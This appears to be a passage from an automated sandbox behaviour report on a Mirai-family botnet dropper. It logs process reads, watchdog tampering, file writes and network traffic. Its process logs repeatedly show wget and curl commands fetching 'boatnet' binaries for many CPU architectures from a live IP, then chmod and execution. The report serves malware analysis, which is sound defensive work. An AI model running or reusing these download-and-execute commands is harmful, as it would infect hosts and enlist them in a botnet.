| File opened for reading | /proc/1132/status | /tmp/WTF | N/A |
| File opened for reading | /proc/20/status | /tmp/WTF | N/A |
| File opened for reading | /proc/15/status | /tmp/WTF | N/A |
| File opened for reading | /proc/25/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1676/status | /tmp/WTF | N/A |
| File opened for reading | /proc/497/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1079/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1065/status | /tmp/WTF | N/A |
| File opened for reading | /proc/9/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1486/status | /tmp/WTF | N/A |
| File opened for reading | /proc/467/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1514/status | /tmp/WTF | N/A |
| File opened for reading | /proc/440/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1528/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1637/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1618/status | /tmp/WTF | N/A |
| File opened for reading | /proc/19/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1515/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1544/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1065/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1143/status | /tmp/WTF | N/A |
| File opened for reading | /proc/323/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1620/status | /tmp/WTF | N/A |
| File opened for reading | /proc/18/status | /tmp/WTF | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.ppc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.spc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.m68k]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | N/A | udp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| GB | 185.125.188.61:443 | N/A | tcp |
| GB | 185.125.188.62:443 | N/A | tcp |
| US | 151.101.1.91:443 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| US | 151.101.1.91:443 | N/A | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| GB | 195.181.164.14:443 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
memory/1525-1-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1534-2-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1543-3-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1552-4-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1561-5-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1603-6-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1613-7-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1629-8-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1646-9-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1671-10-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1682-11-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1692-12-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1703-13-0x0000000008048000-0x000000000805ce08-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
ubuntu2004-amd64-20240729-en
Max time kernel
59s
Max time network
65s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/78/status | /tmp/WTF | N/A |
| File opened for reading | /proc/443/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1548/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1493/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1319/status | /tmp/WTF | N/A |
| File opened for reading | /proc/536/status | /tmp/WTF | N/A |
| File opened for reading | /proc/995/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1124/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1570/status | /tmp/WTF | N/A |
| File opened for reading | /proc/163/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1086/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1514/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1528/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1605/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1485/status | /tmp/WTF | N/A |
| File opened for reading | /proc/301/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1522/status | /tmp/WTF | N/A |
| File opened for reading | /proc/22/status | /tmp/WTF | N/A |
| File opened for reading | /proc/76/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1503/status | /tmp/WTF | N/A |
| File opened for reading | /proc/761/status | /tmp/WTF | N/A |
| File opened for reading | /proc/75/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1123/status | /tmp/WTF | N/A |
| File opened for reading | /proc/12/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1551/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1074/status | /tmp/WTF | N/A |
| File opened for reading | /proc/22/status | /tmp/WTF | N/A |
| File opened for reading | /proc/16/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1052/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1454/status | /tmp/WTF | N/A |
| File opened for reading | /proc/800/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1487/status | /tmp/WTF | N/A |
| File opened for reading | /proc/22/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1074/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1546/status | /tmp/WTF | N/A |
| File opened for reading | /proc/497/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1082/status | /tmp/WTF | N/A |
| File opened for reading | /proc/71/status | /tmp/WTF | N/A |
| File opened for reading | /proc/89/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1122/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1454/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1461/status | /tmp/WTF | N/A |
| File opened for reading | /proc/808/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1570/status | /tmp/WTF | N/A |
| File opened for reading | /proc/2/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1574/status | /tmp/WTF | N/A |
| File opened for reading | /proc/616/status | /tmp/WTF | N/A |
| File opened for reading | /proc/505/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1548/status | /tmp/WTF | N/A |
| File opened for reading | /proc/636/status | /tmp/WTF | N/A |
| File opened for reading | /proc/761/status | /tmp/WTF | N/A |
| File opened for reading | /proc/827/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1481/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1088/status | /tmp/WTF | N/A |
| File opened for reading | /proc/175/status | /tmp/WTF | N/A |
| File opened for reading | /proc/176/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1494/status | /tmp/WTF | N/A |
| File opened for reading | /proc/70/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1435/status | /tmp/WTF | N/A |
| File opened for reading | /proc/480/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1597/status | /tmp/WTF | N/A |
| File opened for reading | /proc/952/status | /tmp/WTF | N/A |
| File opened for reading | /proc/538/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1508/status | /tmp/WTF | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/cat
[cat boatnet.x86]
/usr/bin/chmod
